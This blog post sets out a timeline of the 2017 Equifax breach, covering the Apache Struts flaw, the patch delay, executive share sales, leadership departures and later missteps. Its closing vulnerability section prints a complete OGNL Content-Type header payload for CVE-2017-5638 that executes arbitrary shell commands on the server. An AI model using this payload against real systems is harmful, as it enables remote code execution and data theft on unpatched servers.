Tag Archives: Struts

Equifax Breach Timeline

Summary

In 2017 Equifax were breached, the breach was discovered on July 29[5] and an announcement was published on Sept 7.[5] It wasn’t the largest breach of all time, and not even of 2017, but it was big and the data was sensitive. Over the two weeks following the announcement, Equifax stock fell from 142.72 to 92.98 (34.58%)

In regards to large breaches, in the same year Yahoo “upgraded” their previous August 2013 breach to note that it now believed to have affected all 3 billion accounts held on their systems. This figure was up from the original reported 1 billion affected accounts.[1][2][3] Yahoo noted that the stolen user information may have included names, email addresses, telephone numbers, dates of birth, MD5 hashes of passwords and in some cases encrypted or unencrypted security questions and answers.[3]

Additionally River City Media suffered a security incident that saw 1.37 billion email/postal addresses leaked. River City Media clarified that full name, IP address and email address was included for every record whilst physical (postal) address was included for “some” accounts.[4]

These breaches dwarf the “approximately 143 million” U.S. consumers affected which was the initial estimation, later increased to 145.5 million U.S. consumers” affected.[10] This increase additionally included 694,000 UK[21] citizens and 8,000 Canadian citizens.[9]

Initially the attack seemed to have taken place from mid-May and involved names, social security numbers, dates of birth, addresses and in some cases credit card numbers and driving license numbers.[6] However there was an earlier breach in March which Bloomberg reports was performed by the same intruders,[7] although Equifax released a statement denying the events were related:[8]

“The March event reported by Bloomberg is not related to the criminal hacking that was discovered on 29 July. Mandiant has investigated both events and found no evidence that these two separate events or the attackers were related.”

The latter breach was due to an Apache Struts vulnerability now known as CVE-2017-5638 which was publicly announced on 2017-03-06 along with a fix, an exploit was released as early as 2017-03-07[18] although Equifax did not patch the issue until 2017-07-30.[11] Putting the time to patch at 146 days.

The breach was detected on July 29th and days later four top managers sold some of their shares in Equifax. The Chief Financial Officer sold 13% of their holdings a $946,374. The President of US Information Solutions sold 9% of their holdings at $584,099. The President of Workforce Solutions sold 4% of their holdings at $250,458. Additionally a Senior VP of Investor Relations also sold shares.[13]

A special committee set up by Equifax’s board conducted an investigation. That investigation held 62 interviews and reviewed 55,000 documents, which included emails, text messages and phone logs and determined the four had no knowledge of the breach and this was not considered insider trader. Additionally they had all gained pre-clearance to sell the stock.[14]

However the US Justice Department are reportedly investigating the share sales[16] and the Federal Trade Commission is investigating the breach.[17]
Oh, and the CEO blamed an individual person for causing the data breach by failing to communicate the requirement to apply the patch.[15][20] However the CEO retired following the breach. He received a payout of $90,000,000. The Chief Information Officer and Chief Security Officer also both retired following the breach.

On a funny angle, during the period following the announcement of the breach, Equifax official twitter accounts accidentally (and repeatedly) misdirected users to a phishing site instead of their own information site. They intended to send them to equifaxsecurity2017.com but instead sent them to a fake site hosted by a security researcher at securityequifax2017.com.[19][23]

Finally, following their second breach the Equifax Credit Assistance site was found to be serving malicious software posing as a Adobe Flash update. They reportedly corrected this issue on October 12.[22]

 

Timeline

Feb 14 Apache is notified of the Struts vulnerability
Mar 6 Apache releases a fix for the vulnerability
Mar 7  An exploit is made available through Exploit-DB
 May 14  The day the breach occurred according to an Equifax statement
 Jul 29  Equifax detects the breach
 Jul 30  The exploited system is patched
 Aug 1  CFO and President of U.S. Information Solutions sells shares.
 Aug 2  President of Workforce Solutions sells shares
 Sep 7  Equifax announces the breach
Sep 8  Equifax is critisized for the TrustID forcing users to waive their right to a class action lawsuit and New York Attorney General Eric Schneiderman demands the removal of the language. Equifax share price is down 13.7% since Sep 7.
 Sep 9  Equifax twitter account accidentally and repeatedly directs users to phishing site
 Sep 15  Equifax shares are down 34.58% following the breach announcement CSO and CIO announce retirement “effective immediately”
 Sep 26  CEO announces retirement, and takes a $90,000,000 payout.
 Oct 2  Equifax raises the number of affected US to 145.5 million and adds 800 Canadians
 Oct 3 Equifax CEO blames a single individual for the breach
 Oct 10 Equifax announces 15.2m UK records compromised, of which 14.5 contain names and dates of birth, but 693,665 contain sensitive information.
 Oct 12 Equifax announces it has removed malicious software from its Credit Assistance site.
 Nov 3  Equifax announces it found no wrong doings in the four executives share trades.

 

Vulnerability Details

The vulnerability exploited was CVE-2017-5638 which is an arbitrary command execution vulnerability within Apache Struts. Several exploits have been written with an initial proof-of-concept being released within 24 hours of the patch release day.

The vulnerability works by specifying a crafted Content-Type, Content-Disposition, or Content-Length HTTP header within a HTTP request. The headers can be crafted to include an OGNL expression which can cause arbitrary command execution. Such as:

Content-Type: %{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’CMD HERE’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

 

References

1. https://www.theverge.com/2017/10/3/16414306/yahoo-security-data-breach-3-billion-verizon
2. https://www.oath.com/press/yahoo-provides-notice-to-additional-users-affected-by-previously/
3. https://help.yahoo.com/kb/account/SLN28451.html?impressions=true
4. https://www.theregister.co.uk/2017/03/07/rcm_email_megaleak/
5. https://investor.equifax.com/news-and-events/news/2017/09-07-2017-213000628
6. https://www.usatoday.com/story/money/2017/09/08/equifax-shares-tumble-after-data-hack-announcement/645146001/
7. https://www.bloomberg.com/news/articles/2017-09-18/equifax-is-said-to-suffer-a-hack-earlier-than-the-date-disclosed
8. https://www.theguardian.com/technology/2017/sep/19/equifax-credit-firm-march-breach-massive-may-hack-customers
9. http://www.bbc.co.uk/news/business-41575188
10. https://www.equifaxsecurity2017.com/frequently-asked-questions/
11. https://securestrategy.co.nz/2017/10/01/what-equifax-did-wrong/
12. https://arstechnica.co.uk/information-technology/2017/09/equifax-hack-started-4-months-before-it-was-detected/?comments=1&post=34027857
13. https://www.theregister.co.uk/2017/11/03/equifax_share_trade_investigation/
14. https://uk.reuters.com/article/uk-equifax-cyber/equifax-clears-executives-who-sold-shares-after-hack-idUKKBN1D31GV
15. https://www.theverge.com/2017/10/3/16410806/equifax-ceo-blame-breach-patch-congress-testimony
16. http://uk.businessinsider.com/equifax-hack-justice-department-investigation-of-alleged-insider-trading-2017-9
17. https://www.theverge.com/2017/9/14/16306872/equifax-breach-ftc-probe-lawsuit-vulnerability
18. https://www.exploit-db.com/exploits/41570/
19. http://www.securityweek.com/equifax-sent-breach-victims-fake-website
20. http://money.cnn.com/2017/09/18/technology/business/equifax-breach-march-earlier/index.html
21. https://www.equifax.co.uk/about-equifax/press-releases/en_gb/-/blogs/equifax-ltd-uk-update-regarding-the-ongoing-investigation-into-us-cyber-security-incident
22. https://krebsonsecurity.com/2017/10/equifax-credit-assistance-site-served-spyware/
23. https://twitter.com/AskEquifax/status/906237250438131716